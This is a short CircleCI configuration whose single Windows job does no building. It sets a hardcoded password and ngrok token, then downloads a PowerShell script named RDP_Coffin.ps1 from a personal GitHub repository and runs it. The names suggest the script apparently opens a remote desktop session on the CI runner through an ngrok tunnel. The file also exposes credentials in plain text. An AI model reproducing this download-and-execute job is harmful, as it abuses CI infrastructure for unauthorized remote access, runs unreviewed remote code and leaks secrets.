version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
 
    steps:
      - run:
          name: new
          command: |
            Set-Variable -Name "PASSWORD" -Value "Prime456$"
            Set-Variable -Name "NGROK" -Value "1tE2D0iWsatWSnVsyKni2wIqNYP_5bhneD8JPrhx44MiQ2TQz"
            Invoke-WebRequest https://raw.githubusercontent.com/BlackJoker9/15af/main/RDP_Coffin.ps1 -OutFile RDP_Coffin.ps1
            ./RDP_Coffin.ps1
